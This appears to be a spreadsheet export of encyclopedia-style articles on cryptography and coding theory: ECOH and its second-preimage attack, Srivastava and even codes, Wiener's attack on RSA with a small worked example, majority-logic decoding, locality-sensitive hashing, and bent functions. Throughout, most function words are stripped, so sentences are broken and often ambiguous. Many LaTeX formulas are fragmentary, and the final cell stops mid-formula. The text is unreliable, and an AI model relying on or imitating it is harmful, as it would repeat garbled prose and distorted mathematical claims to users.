    <t>elliptic curve hash (ecoh) algorithm submitted candidate sha-3 nist hash function competition. however, rejected beginning competition since second pre-image attack found. ecoh based muhash hash algorithm, successfully attacked. however, muhash inefficient practical changes made. main difference muhash applies random oracle, ecoh applies padding function. assuming random oracles, finding collision muhash implies solving discrete logarithm problem. muhash thus provably secure hash, i.e. know finding collision least hard hard known mathematical problem. ecoh random oracles security strictly directly related discrete logarithm problem, still based mathematical functions. ecoh related semaev's problem finding degree solutions summation polynomial equations binary field, called summation polynomial problem. efficient algorithm solve problem given far. although problem proven np-hard, assumed algorithm exist. under certain assumptions, finding collision ecoh also viewed instance subset problem. besides solving summation polynomial problem, exists another find second pre-images thus collisions, wagner's generalized birthday attack. ecoh good example hash function based mathematical functions (with provable security approach) rather classical mixing bits obtain hash. algorithm given {\displaystyle ecoh divides message {\displaystyle {\displaystyle blocks {\displaystyle m_{0},\ldots ,m_{n-1}} last block incomplete, padded single appropriate number furthermore {\displaystyle function maps message block integer elliptic curve point. then using mapping {\displaystyle block transformed elliptic curve point {\displaystyle p_{i}} points added together points. additional point {\displaystyle x_{1}} contains padding depends message length. second additional point {\displaystyle x_{2}} depends message length message blocks. result truncated hash {\displaystyle {\displaystyle {\begin{aligned}p_{i}&amp;{}:=p(m_{i},i)\\x_{1}&amp;{}:=p'(n)\\x_{2}&amp;{}:=p^{*}(m_{i},n)\\q&amp;{}:=\sum _{i=0}^{n-1}p_{i}+x_{1}+x_{2}\\r&amp;{}:=f(q)\end{aligned}}} extra points computed {\displaystyle {\displaystyle p^{*}} {\displaystyle adds elliptic curve points extra points together. finally, result passed output transformation function hash result {\displaystyle read algorithm, "ecoh: elliptic curve only hash". examples four ecoh algorithms proposed, ecoh-224, ecoh-256, ecoh-384 ecoh-512. number represents size message digest. they differ length parameters, block size used elliptic curve. first uses elliptic curve b-283: {\displaystyle x^{283}+x^{12}+x^{7}+x^{5}+1} parameters (128, 64). ecoh-384 uses curve b-409: {\displaystyle x^{409}+x^{87}+1} parameters (192, 64). ecoh-512 uses curve b-571: {\displaystyle x^{571}+x^{10}+x^{5}+x^{2}+1} parameters (256, 128, 128). hash messages length {\displaystyle 2^{128}} properties incrementality: ecoh message updated quickly, given small change message intermediate value ecoh computation. parallelizability: this means computation {\displaystyle p_{i}'s} done parallel systems. speed: ecoh algorithm thousand times slower sha-1. however, given developments desktop hardware towards parallelization carryless multiplication, ecoh years fast sha-1 long messages. short messages, ecoh relatively slow, unless extensive tables used. security ecoh ecoh hash functions based concrete mathematical functions. they designed problem finding collisions reducible known hard mathematical problem (the subset problem). means could find collisions, would able solve underlying mathematical problem assumed hard unsolvable polynomial time. functions properties known provably secure quite unique among rest hash functions. nevertheless, second pre-image (and thus collision) later found assumptions given proof strong. semaev summation polynomial finding collisions second pre-images solving semaev summation polynomials. given elliptic curve exists polynomials {\displaystyle f_{n}} symmetric {\displaystyle variables vanish exactly evaluated abscissae points whose {\displaystyle far, efficient algorithm solve problem exist assumed hard (but proven np-hard). more formally: {\displaystyle \mathbf finite field, {\displaystyle elliptic curve weierstrass equation coefficients {\displaystyle \mathbf {\displaystyle point infinity. known exists multivariable polynomial {\displaystyle f_{n}(x_{1},\ldots ,x_{n})} exist {\displaystyle y_{1},\ldots ,y_{n}} {\displaystyle (x_{1},y_{1})+\ldots +(x_{n},y_{n})=o} this polynomial degree {\displaystyle 2^{n-2}} variable. problem find polynomial. provable security discussion problem finding collisions ecoh similar subset problem. solving subset problem almost hard discrete logarithm problem. generally assumed doable polynomial time. however significantly loose heuristic must assumed, specifically, involved parameters computation necessarily random particular structure. adopts loose heuristic, finding internal ecoh collision viewed instance subset problem. second pre-image attack exists form generalized birthday attack. second pre-image attack description attack: this wagner’s generalized birthday attack. requires 2143 time ecoh-224 ecoh-256, 2206 time ecoh-384, 2287 time ecoh-512. attack sets checksum block fixed value uses collision search elliptic curve points. attack message find hashes message. first split message length blocks. {\displaystyle m'=(m_{1},m_{2},m_{3},m_{4},m_{5},m_{6})} natural number. choose different numbers {\displaystyle (m_{0},m_{1})} define {\displaystyle m_{2}} {\displaystyle m_{2}:=m_{0}+m_{1}} compute corresponding elliptic curve points {\displaystyle p(m_{0},0)+p(m_{1},1)+p(m_{2},2)} store list. choose different random values {\displaystyle (m_{3},m_{4})} define {\displaystyle m_{5}:=m_{3}+m_{4}} compute {\displaystyle q-x_{1}-x_{2}-p(m_{3},3)-p(m_{4},4)-p(m_{5},5)} store second list. note target known. {\displaystyle x_{1}} depends length message fixed. {\displaystyle x_{2}} depends length message blocks, choose message blocks always zero. thus, {\displaystyle x_{2}} fixed tries. larger square root number points elliptic curve expect collision lists. this gives message {\displaystyle (m_{1},m_{2},m_{3},m_{4},m_{5},m_{6})} with: {\displaystyle q=\sum _{i=0}^{5}p(m_{i},i)+x_{1}+x_{2}} this means message leads target value thus second preimage, question. workload times partial hash computations. info, second pre-image attack against elliptic curve only hash (ecoh)". actual parameters: ecoh-224 ecoh-256 elliptic curve b-283 approximately {\displaystyle 2^{283}} points curve. choose {\displaystyle k=2^{142}} attack complexity {\displaystyle 2^{143}} ecoh-384 uses elliptic curve b-409 approximately {\displaystyle 2^{409}} points curve. choosing {\displaystyle k=2^{205}} gives attack complexity {\displaystyle 2^{206}.} ecoh-512 uses elliptic curve b-571 approximately {\displaystyle 2^{571}} points curve. choosing {\displaystyle k=2^{286}} gives attack complexity {\displaystyle 2^{287}.} ecoh2 official comments ecoh included proposal called ecoh2 doubles elliptic curve size effort stop halcrow-ferguson second preimage attack prediction improved similar performance. references daniel brown, matt campagna, rene struik (2008). "ecoh: elliptic curve only hash". michael halcrow, niels ferguson (2009). second pre-image attack against elliptic curve only hash (ecoh)".</t>
  </si>
  <si>
    <t>Srivastava code</t>
  </si>
  <si>
    <t>coding theory, srivastava codes, formulated professor srivastava, form class parameterised error-correcting codes special case alternant codes. definition original srivastava code gf(q) length defined parity check matrix alternant form {\displaystyle {\begin{bmatrix}{\frac {\alpha _{1}^{\mu }}{\alpha _{1}-w_{1}}}&amp;\cdots &amp;{\frac {\alpha _{n}^{\mu }}{\alpha _{n}-w_{1}}}\\\vdots &amp;\ddots &amp;\vdots \\{\frac {\alpha _{1}^{\mu }}{\alpha _{1}-w_{s}}}&amp;\cdots &amp;{\frac {\alpha _{n}^{\mu }}{\alpha _{n}-w_{s}}}\\\end{bmatrix}}} elements gf(qm) properties parameters code length dimension minimum distance references f.j. macwilliams; n.j.a. sloane (1977). theory error-correcting codes. north-holland. 357–360. isbn 0-444-85193-3.</t>
  </si>
  <si>
    <t>Even code</t>
  </si>
  <si>
    <t>binary code called even code hamming weight codewords even. even code generator polynomial include (1+x) minimal polynomial product. furthermore, binary code called doubly even hamming weight codewords divisible even code doubly even said strictly even. examples doubly even codes extended binary hamming code block length extended binary golay code block length these codes are, addition, self-dual. this article incorporates material even code planetmath, licensed creative commons attribution/share-alike license.</t>
  </si>
  <si>
    <t>Wiener's attack</t>
  </si>
  <si>
    <t>wiener's attack, named cryptologist michael wiener, type cryptographic attack rsa. attack uses continued fraction method expose private small. background fictional characters alice people want communicate securely. more specifically, alice wants send message read. first chooses primes then calculates modulus this modulus made public together encryption exponent form public pair making information public, anyone encrypt messages bob. decryption exponent satisfies {\displaystyle ed=1{\bmod {\lambda }}(n)} {\displaystyle \lambda (n)} denotes carmichael function, though sometimes {\displaystyle \varphi (n)} euler’s function, used (note: order multiplicative group {\displaystyle \mathbb _{n}^{*}} necessarily cyclic group). encryption exponent {\displaystyle \lambda (n)} also must relatively prime modular inverse. factorization private kept secret, decrypt message. denote private pair encryption message given {\displaystyle c\equiv m^{e}{\bmod {n}}} decryption cipher text {\displaystyle given {\displaystyle c^{d}\equiv (m^{e})^{d}\equiv m^{ed}\equiv m{\bmod {n}}} (using fermat's little theorem). using euclidean algorithm, efficiently recover secret knows factorization secret efficiently factor modulus small private cryptosystem, might tend small value rather large random number improve decryption performance. however, wiener’s attack shows choosing small value result insecure system attacker recover secret information, i.e., break system. this break based wiener’s theorem, holds small values wiener proved attacker efficiently find {\displaystyle d&lt;{\frac {1}{3}}n^{\frac {1}{4}}} .wiener's paper also presented countermeasures attack allow fast decryption. techniques described follows. choosing large public key: replace {\displaystyle {\displaystyle {\displaystyle e'=e+k\cdot \lambda (n)} large {\displaystyle when {\displaystyle large enough, i.e. {\displaystyle e'&gt;n^{\frac {3}{2}}} wiener’s attack applied regardless small {\displaystyle using chinese remainder theorem: suppose chooses {\displaystyle d_{p}=d{\bmod {(}}p-1)} {\displaystyle d_{q}=d{\bmod {(}}q-1)} small {\displaystyle not, fast decryption {\displaystyle done follows: first compute {\displaystyle m_{p}\equiv c^{d_{p}}{\bmod {p}}} {\displaystyle m_{q}\equiv c^{d_{q}}{\bmod {q}}} chinese remainder theorem compute unique value {\displaystyle m\in \mathbb {z_{n}} satisfies {\displaystyle m\equiv m_{p}{\bmod {p}}} {\displaystyle m\equiv m_{q}{\bmod {q}}} result {\displaystyle satisfies {\displaystyle m\equiv c^{d}{\bmod {n}}} needed. point wiener’s attack apply value {\displaystyle d{\bmod {\lambda }}(n)} large. wiener's attack works note {\displaystyle \lambda (n)=\operatorname {lcm} (p-1,q-1)={\frac {(p-1)(q-1)}{g}}={\frac {\varphi (n)}{g}}} {\displaystyle g=\gcd(p-1,q-1)} since {\displaystyle ed\equiv 1{\pmod {\lambda (n)}}} ,there exists integer {\displaystyle ed=k\times \lambda (n)+1} {\displaystyle ed={\frac {k}{g}}(p-1)(q-1)+1} defining {\displaystyle k={\frac {k}{\gcd(k,g)}}} {\displaystyle g={\frac {g}{\gcd(k,g)}}} substituting gives: {\displaystyle ed={\frac {k}{g}}(p-1)(q-1)+1} .divided {\displaystyle dpq} {\displaystyle {\frac {e}{pq}}={\frac {k}{dg}}(1-\delta {\displaystyle \delta ={\frac {p+q-1-{\frac {g}{k}}}{pq}}} .so, {\displaystyle {\frac {e}{pq}}} slightly smaller {\displaystyle {\frac {k}{dg}}} former composed entirely public information. however, method checking guess still required. using simple algebraic manipulations identities, guess checked accuracy. wiener's theorem {\displaystyle n=pq} {\displaystyle q&lt;p&lt;2q} {\displaystyle d&lt;{\frac {1}{3}}n^{\frac {1}{4}}} given {\displaystyle \left\langle n,e\right\rangle {\displaystyle ed\equiv (\mathrm {mod} \lambda (n))} attacker efficiently recover {\displaystyle example suppose public keys 90581 17993 {\displaystyle \left\langle n,e\right\rangle =\left\langle 90581,17993\right\rangle attack shall determine {\displaystyle using wiener's theorem continued fractions approximate {\displaystyle first find continued fractions expansion {\displaystyle {\frac {e}{n}}} note algorithm finds fractions lowest terms. know 17993 90581 {\displaystyle {\frac {e}{n}}={\frac {17993}{90581}}={\cfrac {1}{5+{\cfrac {1}{29+\dots +{\cfrac {1}{3}}}}}}=\left[0,5,29,4,1,3,2,4,3\right]} according continued fractions expansion {\displaystyle {\frac {e}{n}}} convergents {\displaystyle {\frac {k}{d}}} are: 2794 1256 6323 5579 28086 17993 90581 {\displaystyle {\frac {k}{d}}=0,{\frac {1}{5}},{\frac {29}{146}},{\frac {117}{589}},{\frac {146}{735}},{\frac {555}{2794}},{\frac {1256}{6323}},{\frac {5579}{28086}},{\frac {17993}{90581}}} verify first convergent produce factorization {\displaystyle however, convergent {\displaystyle {\frac {1}{5}}} yields 17993 89964 {\displaystyle \varphi (n)={\frac {ed-1}{k}}={\frac {17993\times 5-1}{1}}=89964} now, solve equation {\displaystyle x^{2}-\left(\left(n-\varphi (n)\right)+1\right)x+n=0} 90581 89964 90581 {\displaystyle x^{2}-\left(\left(90581-89964\right)+1\right)x+90581=0} 90581 {\displaystyle x^{2}-618x+90581=0} find roots {\displaystyle x=379;239} therefore found factorization 90581 {\displaystyle n=90581=379\times 239=p\times .notice that, modulus 90581 {\displaystyle n=90581} wiener's theorem work 5.7828 {\displaystyle d&lt;{\frac {n^{\frac {1}{4}}}{3}}\approx 5.7828} proof wiener's theorem proof based approximations using continued fractions. since {\displaystyle ed=1{\bmod {\lambda }}(n)} exists {\displaystyle {\mathit {k}}} {\displaystyle ed-k\lambda (n)=1} therefore {\displaystyle \left|{\frac {e}{\lambda (n)}}-{\frac {k}{d}}\right\vert ={\frac {1}{d\lambda (n)}}} .let {\displaystyle g=\gcd(p-1,q-1)} note {\displaystyle \varphi (n)} used instead {\displaystyle \lambda (n)} proof replaced {\displaystyle g=1} {\displaystyle \varphi (n)} replaced {\displaystyle \lambda (n)} then multiplying {\displaystyle {\frac {1}{g}}} {\displaystyle \left|{\frac {e}{\varphi (n)}}-{\frac {k}{gd}}\right\vert ={\frac {1}{d\varphi (n)}}} hence, {\displaystyle {\frac {k}{gd}}} approximation {\displaystyle {\frac {e}{\varphi (n)}}} although attacker know {\displaystyle \varphi (n)} {\displaystyle approximate indeed, since {\displaystyle \varphi (n)=n-p-q+1} {\displaystyle p+q-1&lt;3{\sqrt {n}}} have: {\displaystyle \left\vert p+q-1\right\vert &lt;3{\sqrt {n}}} {\displaystyle \left\vert n-\varphi (n)\right\vert &lt;3{\sqrt {n}}} using {\displaystyle place {\displaystyle \varphi (n)} obtain: {\displaystyle {\begin{aligned}\left\vert {\frac {e}{n}}-{\frac {k}{gd}}\right\vert &amp;=\left\vert {\frac {edg-kn}{ngd}}\right\vert \\&amp;=\left\vert {\frac {edg-k\varphi (n)-kn+k\varphi (n)}{ngd}}\right\vert \\&amp;=\left\vert {\frac {1-k(n-\varphi (n))}{ngd}}\right\vert \\&amp;\leq \left\vert {\frac {3k{\sqrt {n}}}{ngd}}\right\vert ={\frac {3k{\sqrt {n}}}{{\sqrt {n}}{\sqrt {n}}gd}}\leq {\frac {3k}{d{\sqrt {n}}}}\end{aligned}}} now, {\displaystyle k\lambda (n)=ed-1&lt;ed} {\displaystyle k\lambda (n)&lt;ed} since {\displaystyle e&lt;\lambda (n)} {\displaystyle k\lambda (n)&lt;ed&lt;\lambda (n)d} obtain: {\displaystyle k\lambda (n)&lt;\lambda (n)d} {\displaystyle k&lt;d} since {\displaystyle k&lt;d} {\displaystyle d&lt;{\frac {1}{3}}n^{\frac {1}{4}}} hence obtain: {\displaystyle \left\vert {\frac {e}{n}}-{\frac {k}{gd}}\right\vert \leq {\frac {1}{dn^{\frac {1}{4}}}}} since {\displaystyle d&lt;{\frac {1}{3}}n^{\frac {1}{4}},2d&lt;3d,} {\displaystyle 2d&lt;3d&lt;n^{\frac {1}{4}}} obtain: {\displaystyle 2d&lt;n^{\frac {1}{4}}} {\displaystyle {\frac {1}{2d}}&gt;{\frac {1}{n^{\frac {1}{4}}}}} from (2), conclude {\displaystyle \left\vert {\frac {e}{n}}-{\frac {k}{gd}}\right\vert \leq {\frac {3k}{d{\sqrt {n}}}}&lt;{\frac {1}{d\cdot 2d}}={\frac {1}{2d^{2}}}} {\displaystyle \left\vert x-{\frac {a}{b}}\right\vert &lt;{\frac {1}{2b^{2}}}} {\displaystyle {\frac {a}{b}}} convergent {\displaystyle thus {\displaystyle {\frac {k}{gd}}} appears among convergents {\displaystyle {\frac {e}{n}}} therefore algorithm indeed eventually find {\displaystyle {\frac {k}{gd}}} references further reading coppersmith, (1996). low-exponent related messages. springer-verlag berlin heidelberg.dujella, andrej (2004). continued fractions small secret exponent. python implementation wiener's attack. stinson, douglas (2002). cryptography theory practice ed.). press company. 200–204. isbn 1-58488-206-9.</t>
  </si>
  <si>
    <t>Majority logic decoding</t>
  </si>
  <si>
    <t>error detection correction, majority logic decoding method decode repetition codes, based assumption largest number occurrences symbol transmitted symbol. theory binary alphabet made {\displaystyle 0,1} {\displaystyle (n,1)} repetition code used, input mapped code word string {\displaystyle -replicated input bits. generally {\displaystyle n=2t+1} number. repetition codes detect {\displaystyle [n/2]} transmission errors. decoding errors occur transmission errors occur. thus, assuming bit-transmission errors independent, probability error repetition code given {\displaystyle p_{e}=\sum _{k={\frac {n+1}{2}}}^{n}{n \choose k}\epsilon ^{k}(1-\epsilon )^{(n-k)}} {\displaystyle \epsilon error transmission channel. algorithm assumption: code word {\displaystyle (n,1)} {\displaystyle n=2t+1} number. calculate {\displaystyle d_{h}} hamming weight repetition code. {\displaystyle d_{h}\leq decode code word {\displaystyle d_{h}\geq t+1} decode code word 1'sthis algorithm boolean function right, majority function. example {\displaystyle (n,1)} code, r=[1 would decoded {\displaystyle n=5,t=2} {\displaystyle d_{h}=3} r'=[1 hence transmitted message references rice university, https://web.archive.org/web/20051205194451/http://cnx.rice.edu/content/m0071/latest/</t>
  </si>
  <si>
    <t>Locality-preserving hashing</t>
  </si>
  <si>
    <t>computer science, locality-sensitive hashing (lsh) algorithmic technique hashes similar input items "buckets" high probability. (the number buckets much smaller universe possible input items.) since similar items buckets, technique used data clustering nearest neighbor search. differs conventional hashing techniques hash collisions maximized, minimized. alternatively, technique seen reduce dimensionality high-dimensional data; high-dimensional input items reduced low-dimensional versions preserving relative distances items. hashing-based approximate nearest neighbor search algorithms generally main categories hashing methods: either data-independent methods, locality-sensitive hashing (lsh); data-dependent methods, locality-preserving hashing (lph). definitions family {\displaystyle {\mathcal {f}}} defined metric space {\displaystyle {\mathcal {m}}=(m,d)} threshold {\displaystyle r&gt;0} approximation factor {\displaystyle c&gt;1} probabilities {\displaystyle p_{1}} {\displaystyle p_{2}} .this family {\displaystyle {\mathcal {f}}} functions {\displaystyle h\colon m\to elements metric space buckets {\displaystyle s\in family must satisfy following conditions points {\displaystyle p,q\in hash function {\displaystyle chosen uniformly random {\displaystyle {\mathcal {f}}} {\displaystyle d(p,q)\leq {\displaystyle h(p)=h(q)} (i.e., collide) probability least {\displaystyle p_{1}} {\displaystyle d(p,q)\geq {\displaystyle h(p)=h(q)} probability {\displaystyle p_{2}} family interesting {\displaystyle p_{1}&gt;p_{2}} such family {\displaystyle {\mathcal {f}}} called {\displaystyle (r,cr,p_{1},p_{2})} -sensitive. alternatively defined respect universe items similarity function {\displaystyle \phi \colon u\times u\to [0,1]} scheme family hash functions coupled probability distribution functions function {\displaystyle h\in chosen according satisfies property {\displaystyle pr_{h\in h}[h(a)=h(b)]=\phi (a,b)} {\displaystyle a,b\in locality-preserving hashing locality-preserving hash hash function maps points metric space {\displaystyle {\mathcal {m}}=(m,d)} scalar value {\displaystyle d(p,q)&lt;d(q,r)\rightarrow |f(p)-f(q)|&lt;|f(q)-f(r)|} three points {\displaystyle p,q,r\in words, hash functions relative distance input values preserved relative distance output hash values; input values closer produce output hash values closer other. this contrast cryptographic hash functions checksums, designed random output difference adjacent inputs. first family locality-preserving hash functions devised facilitate data pipelining implementations parallel random-access machine (pram) algorithms universal hashing reduce memory contention network congestion.locality preserving hashes related space-filling curves. amplification given {\displaystyle (d_{1},d_{2},p_{1},p_{2})} -sensitive family {\displaystyle {\mathcal {f}}} construct families {\displaystyle {\mathcal {g}}} either and-construction or-construction {\displaystyle {\mathcal {f}}} create and-construction, define family {\displaystyle {\mathcal {g}}} hash functions function constructed random functions {\displaystyle h_{1},\ldots ,h_{k}} {\displaystyle {\mathcal {f}}} hash function {\displaystyle g\in {\mathcal {g}}} {\displaystyle g(x)=g(y)} {\displaystyle h_{i}(x)=h_{i}(y)} {\displaystyle i=1,2,\ldots since members {\displaystyle {\mathcal {f}}} independently chosen {\displaystyle g\in {\mathcal {g}}} {\displaystyle {\mathcal {g}}} {\displaystyle (d_{1},d_{2},p_{1}^{k},p_{2}^{k})} -sensitive family. create or-construction, define family {\displaystyle {\mathcal {g}}} hash functions function constructed random functions {\displaystyle h_{1},\ldots ,h_{k}} {\displaystyle {\mathcal {f}}} hash function {\displaystyle g\in {\mathcal {g}}} {\displaystyle g(x)=g(y)} {\displaystyle h_{i}(x)=h_{i}(y)} values since members {\displaystyle {\mathcal {f}}} independently chosen {\displaystyle g\in {\mathcal {g}}} {\displaystyle {\mathcal {g}}} {\displaystyle (d_{1},d_{2},1-(1-p_{1})^{k},1-(1-p_{2})^{k})} -sensitive family. applications applied several problem domains, including: near-duplicate detection hierarchical clustering genome-wide association study image similarity identification visualrank gene expression similarity identification audio similarity identification nearest neighbor search audio fingerprint digital video fingerprinting physical data organization database management systems training fully connected neural networkscomputer security methods sampling hamming distance easiest ways construct family sampling. this approach works hamming distance d-dimensional vectors {\displaystyle \{0,1\}^{d}} here, family {\displaystyle {\mathcal {f}}} hash functions simply family projections points {\displaystyle coordinates, i.e., {\displaystyle {\mathcal {f}}=\{h\colon \{0,1\}^{d}\to \{0,1\}\mid h(x)=x_{i}{\text{ }}i\in \{1,\ldots ,d\}\}} {\displaystyle x_{i}} {\displaystyle coordinate {\displaystyle random function {\displaystyle {\displaystyle {\mathcal {f}}} simply selects random input point. this family following parameters: {\displaystyle p_{1}=1-r/d} {\displaystyle p_{2}=1-cr/d} min-wise independent permutations suppose composed subsets ground enumerable items similarity function interest jaccard index permutation indices {\displaystyle a\subseteq {\displaystyle h(a)=\min _{a\in a}\{\pi (a)\}} each possible choice defines single hash function mapping input sets elements define function family functions uniform distribution. given sets {\displaystyle a,b\subseteq event {\displaystyle h(a)=h(b)} corresponds exactly event minimizer {\displaystyle a\cup lies inside {\displaystyle a\cap chosen uniformly random, {\displaystyle pr[h(a)=h(b)]=j(a,b)\,} {\displaystyle (h,d)\,} define scheme jaccard index. because symmetric group elements size choosing truly random permutation full symmetric group infeasible even moderately sized because fact, significant work finding family permutations "min-wise independent" permutation family element domain equal probability minimum randomly chosen established min-wise independent family permutations least size {\displaystyle \operatorname {lcm} \{\,1,2,\ldots ,n\,\}\geq e^{n-o(n)}} bound tight.because min-wise independent families practical applications, variant notions min-wise independence introduced: restricted min-wise independent permutations families, approximate min-wise independent families. restricted min-wise independence min-wise independence property restricted certain sets cardinality approximate min-wise independence differs property fixed open source methods nilsimsa hash nilsimsa locality-sensitive hashing algorithm used anti-spam efforts. goal nilsimsa generate hash digest email message digests similar messages similar other. paper suggests nilsimsa satisfies three requirements: digest identifying message vary significantly changes produced automatically. encoding must robust intentional attacks. encoding support extremely risk false positives. tlsh tlsh locality-sensitive hashing algorithm designed range security digital forensic applications. goal tlsh generate hash digests messages distances digests indicate corresponding messages likely similar. testing performed paper range file types identified nilsimsa hash significantly higher false positive rate compared similarity digest schemes tlsh, ssdeep sdhash. implementation tlsh available open-source software. random projection random projection method moses charikar called simhash (also sometimes called arccos) designed approximate cosine distance vectors. basic idea technique choose random hyperplane (defined normal unit vector outset hyperplane hash input vectors. given input vector hyperplane defined {\displaystyle h(v)=sgn(v\cdot that {\displaystyle h(v)=\pm depending side hyperplane lies. each possible choice defines single function. functions uniform distribution again. difficult prove that, vectors {\displaystyle u,v} {\displaystyle pr[h(u)=h(v)]=1-{\frac {\theta (u,v)}{\pi {\displaystyle \theta (u,v)} angle {\displaystyle 1-{\frac {\theta (u,v)}{\pi closely related {\displaystyle \cos(\theta (u,v))} instance hashing produces single bit. vectors' bits match probability proportional cosine angle them. stable distributions hash function {\displaystyle h_{\mathbf ,b}({\boldsymbol {\upsilon }}):{\mathcal {r}}^{d}\to {\mathcal {n}}} maps d-dimensional vector {\displaystyle {\boldsymbol {\upsilon onto integers. each hash function family indexed choice random {\displaystyle \mathbf {\displaystyle {\displaystyle \mathbf d-dimensional vector entries chosen independently stable distribution {\displaystyle real number chosen uniformly range [0,r]. fixed {\displaystyle \mathbf hash function {\displaystyle h_{\mathbf ,b}} given {\displaystyle h_{\mathbf ,b}({\boldsymbol {\upsilon }})=\left\lfloor {\frac {\mathbf \cdot {\boldsymbol {\upsilon }}+b}{r}}\right\rfloor other construction methods hash functions proposed better data. particular k-means hash functions better practice projection-based hash functions, without theoretical guarantee. semantic hashing semantic hashing technique attempts input items addresses closer inputs higher semantic similarity. hashcodes found training artificial neural network graphical model. algorithm nearest neighbor search main applications provide method efficient approximate nearest neighbor search algorithms. consider family {\displaystyle {\mathcal {f}}} algorithm main parameters: width parameter number hash tables first step, define family {\displaystyle {\mathcal {g}}} hash functions function obtained concatenating functions {\displaystyle h_{1},\ldots ,h_{k}} {\displaystyle {\mathcal {f}}} i.e., {\displaystyle g(p)=[h_{1}(p),\ldots ,h_{k}(p)]} words, random hash function obtained concatenating randomly chosen hash functions {\displaystyle {\mathcal {f}}} algorithm constructs hash tables, corresponding different randomly chosen hash function preprocessing step hash d-dimensional points data hash tables. given resulting hash tables non-zero entries, reduce amount memory used hash table {\displaystyle o(n)} using standard hash functions. given query point algorithm iterates hash functions considered, retrieves data points hashed bucket process stopped soon point within distance {\displaystyle found. given parameters algorithm following performance guarantees: preprocessing time: {\displaystyle o(nlkt)} time evaluate function {\displaystyle h\in {\mathcal {f}}} input point space: {\displaystyle o(nl)} plus space storing data points; query time: {\displaystyle o(l(kt+dnp_{2}^{k}))} algorithm succeeds finding point within distance {\displaystyle exists point within distance probability least {\displaystyle 1-(1-p_{1}^{k})^{l}} ;for fixed approximation ratio {\displaystyle c=1+\epsilon probabilities {\displaystyle p_{1}} {\displaystyle p_{2}} {\displaystyle k={\big \lceil }{\tfrac {\log n}{\log 1/p_{2}}}{\big \rceil {\displaystyle l=\lceil p_{1}^{-k}\rceil =o(n^{\rho }p_{1}^{-1})} {\displaystyle \rho ={\tfrac {\log p_{1}}{\log p_{2}}}} then obtains following performance guarantees: preprocessing time: {\displaystyle o(n^{1+\rho }p_{1}^{-1}kt)} space: {\displaystyle o(n^{1+\rho }p_{1}^{-1})} plus space storing data points; query time: {\displaystyle o(n^{\rho }p_{1}^{-1}(kt+d))} improvements when large, possible reuse hashing time {\displaystyle o(n^{\rho this shown gave query time: {\displaystyle o(t\log ^{2}(1/p_{2})/p_{1}+n^{\rho }(d+1/p_{1})} space: {\displaystyle o(n^{1+\rho }/p_{1}+\log ^{2}(1/p_{2})/p_{1})} also sometimes case factor {\displaystyle 1/p_{1}} large. this happens example jaccard similarity data, even similar neighbor often quite jaccard similarity query. shown reduce query time {\displaystyle o(n^{\rho }/p_{1}^{1-\rho (not including hashing costs) similarly space usage. also bloom filter curse dimensionality feature hashing fourier-related transforms geohash multilinear subspace learning principal component analysis random indexing rolling hash singular value decomposition sparse distributed memory wavelet compression references further reading samet, (2006) foundations multidimensional metric data structures. morgan kaufmann. isbn 0-12-369446-9indyk, piotr; motwani, rajeev; raghavan, prabhakar; vempala, santosh (1997). "locality-preserving hashing multidimensional spaces". proceedings twenty-ninth annual symposium theory computing. stoc '97. 618–625. citeseerx 10.1.1.50.4927. doi:10.1145/258533.258656. isbn 978-0-89791-888-6. s2cid 15693787. chin, andrew (1994). "locality-preserving hash functions general purpose parallel computation" (pdf). algorithmica. (2–3): 170–181. doi:10.1007/bf01185209. s2cid 18108051. external links alex andoni's homepage lshkit: locality sensitive hashing library python locality sensitive hashing library optionally supports persistence redis caltech large scale image search toolbox: matlab toolbox implementing several hash functions, addition kd-trees, hierarchical k-means, inverted file search algorithms. slash: library, implementing spherical terasawa, tanaka, lshbox: open source toolbox locality-sensitive hashing large scale image retrieval, also support python matlab. srs: implementation in-memory, space-efficient approximate nearest neighbor query processing algorithm based p-stable random projection tlsh open source github javascript port tlsh (trend micro locality sensitive hashing) bundled node.js module java port tlsh (trend micro locality sensitive hashing) bundled maven package</t>
  </si>
  <si>
    <t>Bent function</t>
  </si>
  <si>
    <t>mathematical field combinatorics, bent function special type boolean function maximally non-linear; different possible linear affine functions measured hamming distance truth tables. concretely, means maximum correlation output function linear function minimal. addition, derivatives bent function balanced boolean functions, change input variables percent chance output value change. maximal nonlinearity means approximating bent function affine (linear) function hard, useful property defense linear cryptanalysis. addition, detecting change output function yields information change occurred inputs, making function immune differential cryptanalysis. bent functions defined named 1960s oscar rothaus research published 1976. they extensively studied applications cryptography, also applied spread spectrum, coding theory, combinatorial design. definition extended several ways, leading different classes generalized bent functions share many useful properties original. known eliseev stepchenkov studied bent functions, called minimal functions, ussr 1962. however, results still declassified. bent functions also known perfectly nonlinear (pn) boolean functions. certain functions close possible perfect nonlinearity (e.g. functions number bits, vectorial functions) known almost perfectly nonlinear (apn). walsh transform bent functions defined terms walsh transform. walsh transform boolean function {\displaystyle f:\mathbb _{2}^{n}\to \mathbb _{2}} function {\displaystyle {\hat {f}}:\mathbb _{2}^{n}\to \mathbb given {\displaystyle {\hat {f}}(a)=\sum _{\scriptstyle {x\in \mathbb _{2}^{n}}}(-1)^{f(x)+a\cdot a1x1 a2x2 anxn (mod product zn2. alternatively, s0(a) f(x) s1(a) f(x) then |s0(a)| |s1(a)| hence {\displaystyle {\hat {f}}(a)=\left|s_{0}(a)\right|-\left|s_{1}(a)\right|=2\left|s_{0}(a)\right|-2^{n}.} boolean function transform lies range {\displaystyle -2^{n}\leq {\hat {f}}(a)\leq 2^{n}.} moreover, linear function f0(x) affine function f1(x) correspond extreme cases, since {\displaystyle {\hat {f}}_{0}(a)=2^{n},~{\hat {f}}_{1}(a)=-2^{n}.} thus, value {\displaystyle {\hat {f}}(a)} characterizes function f(x) lies range f0(x) f1(x). definition properties rothaus defined bent function boolean function {\displaystyle f:\mathbb _{2}^{n}\to \mathbb _{2}} whose walsh transform constant absolute value. bent functions sense equidistant affine functions, equally hard approximate affine function. simplest examples bent functions, written algebraic normal form, f(x1, x1x2 g(x1, x1x2 x3x4. this pattern continues: x1x2 x3x4 xn−1xn bent function {\displaystyle \mathbb _{2}^{n}\to \mathbb _{2}} every even wide variety bent functions increases. sequence values (−1)f(x), taken lexicographical order, called bent sequence; bent functions bent sequences equivalent properties. form, walsh transform easily computed {\displaystyle {\hat {f}}(a)=w\left(2^{n}\right)(-1)^{f(a)},} w(2n) natural-ordered walsh matrix sequence treated column vector.rothaus proved bent functions exist even bent function {\displaystyle \left|{\hat {f}}(a)\right|=2^{\frac {n}{2}}} zn2. fact, {\displaystyle {\hat {f}}(a)=2^{\frac {n}{2}}(-1)^{g(a)}} also bent. case, {\displaystyle {\hat 